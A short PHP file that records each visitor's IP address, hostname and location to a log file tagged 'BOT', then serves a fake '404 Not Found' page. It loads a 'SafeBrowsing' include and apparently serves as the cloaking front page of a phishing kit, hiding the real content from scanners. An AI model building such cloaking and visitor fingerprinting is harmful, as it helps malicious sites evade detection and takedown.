<?php 
require 'inc/Helper.php';
require 'inc/SafeBrowsing.php';
$date = date('d/m/y H:i');

$ip = getUserIP();
$hostname = get_hostname($ip);
$cek_locaton = check_location($ip);
$useragent = $_SERVER['HTTP_USER_AGENT'];
$type = "ACCESS INDEX";
$message = "{$date}|BOT|{$type}|$ip|{$hostname}|{$cek_locaton}". PHP_EOL;
write("access.txt", "a", $message);
http_response_code(404);
exit("<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>");
?>

